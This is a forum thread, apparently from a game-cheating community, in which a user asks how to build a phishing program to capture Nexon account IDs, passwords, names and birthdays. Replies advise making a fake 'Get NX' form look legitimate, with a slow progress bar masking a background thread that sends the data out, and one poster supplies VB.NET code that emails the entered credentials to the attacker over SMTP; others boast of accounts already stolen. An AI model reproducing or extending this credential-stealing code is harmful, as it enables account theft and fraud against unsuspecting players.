how do i make a phishing program?

Posts 113 of 13 · Page 1 of 1
how do i make a phishing program?
how do i make a program that makes people send their game info to my email like

Nexon ID:

Nexon Password:

Last Name:

Birthday:

[Get NX]

?

and it sends me the info in that format
Make a new form in Visual C#, then add some text boxes, and a button and labels, and a progress bar, make it look flashy and legit. Then when they enter their details and click the button, create 2 threads, in 1 thread make the progress bar run slowly, like ever 100ms or so increment it by 1 and in the other thread have it upload the details to a database, or email them to you.
Quote Originally Posted by cfsharp View Post
Make a new form in Visual C#, then add some text boxes, and a button and labels, and a progress bar, make it look flashy and legit. Then when they enter their details and click the button, create 2 threads, in 1 thread make the progress bar run slowly, like ever 100ms or so increment it by 1 and in the other thread have it upload the details to a database, or email them to you.
should i get 2010 2005 or 2008?
make sure you don't encrypt personal information.
/reqclose already made 1 and stole a sfc1
Quote Originally Posted by svizy View Post
/reqclose already made 1 and stole a sfc1
Link me. I'll test it xD with my fake acc
Lol...@SofaKingH4rd, that's the shittiest looking phisher I've ever seen in my life.
Quote Originally Posted by FUKO View Post
Lol...@SofaKingH4rd, that's the shittiest looking phisher I've ever seen in my life.

I've actually updated the gui.

I've been in photoshop and made a nice looking one now.

but still looking for the code t get stuff sent to your email.
Quote Originally Posted by SofaKingH4rd View Post
I've actually updated the gui.

I've been in photoshop and made a nice looking one now.

but still looking for the code t get stuff sent to your email.
Use System.Net.Mail.
SMTP Client

MailMessage Class (System.Net.Mail)
@SofaKingH4rd
Quote Originally Posted by SofaKingH4rd View Post
Thank you.

But how do I make it send 3 text boxes of information to my email and not just one text box of information?

I'm stuck on that bit :P
Code:
Dim MyMailMessage As New MailMessage()
        MyMailMessage.From = New MailAddress("adress here")
        MyMailMessage.To.Add("adress here")
        MyMailMessage.Subject = "Account Information"
        MyMailMessage.Body = TextBox1.Text & ": " & TextBox2.Text & ": " & TextBox3.Text
        Dim SMTPServer As New SmtpClient("smtp.live.com")
        SMTPServer.Port = 587
        SMTPServer.Credentials = New System.Net.NetworkCredential("username", "password")
        SMTPServer.EnableSsl = True
        Try
            SMTPServer.Send(MyMailMessage)
            MessageBox.Show("Email Sent")
        Catch ex As SmtpException
            MessageBox.Show(ex.Message)
        End Try
@SofaKingH4rd

If you're using gmail, change smtp.live.com to smtp.gmail.com
Quote Originally Posted by FUKO View Post


Code:
Dim MyMailMessage As New MailMessage()
        MyMailMessage.From = New MailAddress("adress here")
        MyMailMessage.To.Add("adress here")
        MyMailMessage.Subject = "Account Information"
        MyMailMessage.Body = TextBox1.Text & ": " & TextBox2.Text & ": " & TextBox3.Text
        Dim SMTPServer As New SmtpClient("smtp.live.com")
        SMTPServer.Port = 587
        SMTPServer.Credentials = New System.Net.NetworkCredential("username", "password")
        SMTPServer.EnableSsl = True
        Try
            SMTPServer.Send(MyMailMessage)
            MessageBox.Show("Email Sent")
        Catch ex As SmtpException
            MessageBox.Show(ex.Message)
        End Try
@SofaKingH4rd

If you're using gmail, change smtp.live.com to smtp.gmail.com


Thanks Man. Much appreciated.

I finished my project now
Posts 113 of 13 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?